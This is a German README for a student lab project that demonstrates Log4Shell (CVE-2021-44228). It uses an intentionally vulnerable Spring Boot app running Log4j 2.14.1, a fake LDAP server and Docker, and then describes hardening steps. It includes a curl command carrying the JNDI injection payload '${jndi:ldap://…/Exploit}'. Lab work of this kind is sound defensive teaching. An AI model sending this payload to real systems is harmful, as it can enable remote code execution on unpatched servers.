
Log4Shell (CVE-2021-44228) Exploit-Demo für die SEAS 8405. Enthält eine verwundbare Spring-Boot-App, einen Fake-LDAP-Server, Docker-Setup, MITRE-Zuordnung, Incident Response und eine vollständige Bildschirmaufzeichnung.
Dieses Projekt demonstriert die Ausnutzung und Eindämmung der Log4Shell-Schwachstelle (CVE-2021-44228) mithilfe einer Docker-basierten Java-Webanwendung mit anfälligem Log4j 2.14.1. Das Setup umfasst außerdem einen simulierten bösartigen LDAP-Server, um den JNDI-Injektionsangriffspfad zu demonstrieren.
Nach der Ausnutzung wird das System gehärtet, indem Log4j aktualisiert, Eingaben validiert und Empfehlungen von MITRE D3FEND und ATT&CK angewendet werden.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
Die App läuft unter:
http://localhost:8080
python3 ldap_server.py
Senden Sie eine Anfrage wie diese an die App:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
Der LDAP-Server sollte die Anfrage empfangen (dies simuliert den JNDI-Exploit).
Nach der Demonstration des Angriffs wurde das System wie folgt gesichert:
${jndi:...}-Mustern)Siehe mitigation_report.pdf für:
Falls das Video nicht direkt hochgeladen ist, ist es über den Link im Bericht verfügbar.
Serpil Rivas
SEAS 8405 – Cybersecurity-Architekturen
Mai 2025